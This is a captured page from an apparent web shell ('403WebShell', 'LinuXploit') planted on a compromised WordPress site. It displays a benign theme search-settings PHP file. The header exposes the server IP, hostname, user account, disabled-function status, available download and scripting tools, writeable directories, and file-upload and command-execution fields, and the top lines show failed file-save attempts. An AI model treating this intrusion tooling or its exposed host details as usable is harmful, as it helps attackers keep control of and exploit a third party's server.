Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.145.16.251
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/diixadigital.com/wp-content/themes/meto/includes/resource/options/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/diixadigital.com/wp-content/themes/meto/includes/resource/options/search_setting.php
<?php

return  array(
    'title'      => esc_html__('Search Page Settings', 'meto'),
    'id'         => 'search_setting',
    'desc'       => '',
    'subsection' => true,
    'fields'     => array(
        array(
            'id'      => 'search_source_type',
            'type'    => 'button_set',
            'title'   => esc_html__('Search Source Type', 'meto'),
            'options' => array(
                'd' => esc_html__('Default', 'meto'),
                'e' => esc_html__('Elementor', 'meto'),
            ),
            'default' => 'd',
        ),
        array(
            'id'       => 'search_elementor_template',
            'type'     => 'select',
            'title'    => __('Template', 'meto'),
            'data'     => 'posts',
            'args'     => [
                'post_type' => [ 'elementor_library' ],
                'posts_per_page'=> -1,
            ],
            'required' => [ 'search_source_type', '=', 'e' ],
        ),

        array(
            'id'       => 'search_default_st',
            'type'     => 'section',
            'title'    => esc_html__('Search Default', 'meto'),
            'indent'   => true,
            'required' => [ 'search_source_type', '=', 'd' ],
        ),
        array(
            'id'      => 'search_page_banner',
            'type'    => 'switch',
            'title'   => esc_html__('Show Banner', 'meto'),
            'desc'    => esc_html__('Enable to show banner on blog', 'meto'),
            'default' => true,
        ),
        array(
            'id'       => 'search_banner_title',
            'type'     => 'text',
            'title'    => esc_html__('Banner Section Title', 'meto'),
            'desc'     => esc_html__('Enter the title to show in banner section', 'meto'),
            'required' => array( 'search_page_banner', '=', true ),
        ),
        //array(
        //    'id'       => 'search_page_background',
        //    'type'     => 'media',
        //    'url'      => true,
        //    'title'    => esc_html__('Background Image', 'meto'),
        //    'desc'     => esc_html__('Insert background image for banner', 'meto'),
        //    'default'  => array(
        //        'url' => METO_URI . 'assets/images/background/pattern-21.png',
        //    ),
        //    'required' => array( 'search_page_banner', '=', true ),
        //),

        array(
            'id'       => 'search_sidebar_layout',
            'type'     => 'image_select',
            'title'    => esc_html__('Layout', 'meto'),
            'subtitle' => esc_html__('Select main content and sidebar alignment.', 'meto'),
            'options'  => array(

                'left'  => array(
                    'alt' => esc_html__('2 Column Left', 'meto'),
                    'img' => get_template_directory_uri() . '/assets/images/redux/2cl.png',
                ),
                'full'  => array(
                    'alt' => esc_html__('1 Column', 'meto'),
                    'img' => get_template_directory_uri() . '/assets/images/redux/1col.png',
                ),
                'right' => array(
                    'alt' => esc_html__('2 Column Right', 'meto'),
                    'img' => get_template_directory_uri() . '/assets/images/redux/2cr.png',
                ),
            ),

            'default' => 'right',
        ),

        array(
            'id'       => 'search_page_sidebar',
            'type'     => 'select',
            'title'    => esc_html__('Sidebar', 'meto'),
            'desc'     => esc_html__('Select sidebar to show at blog listing page', 'meto'),
            'required' => array(
                array( 'search_sidebar_layout', '=', array( 'left', 'right' ) ),
            ),
            'options'  => meto_get_sidebars(),
        ),
        array(
            'id'       => 'search_default_ed',
            'type'     => 'section',
            'indent'   => false,
            'required' => [ 'search_source_type', '=', 'd' ],
        ),

    ),
);

Youez - 2016 - github.com/yon3zu
LinuXploit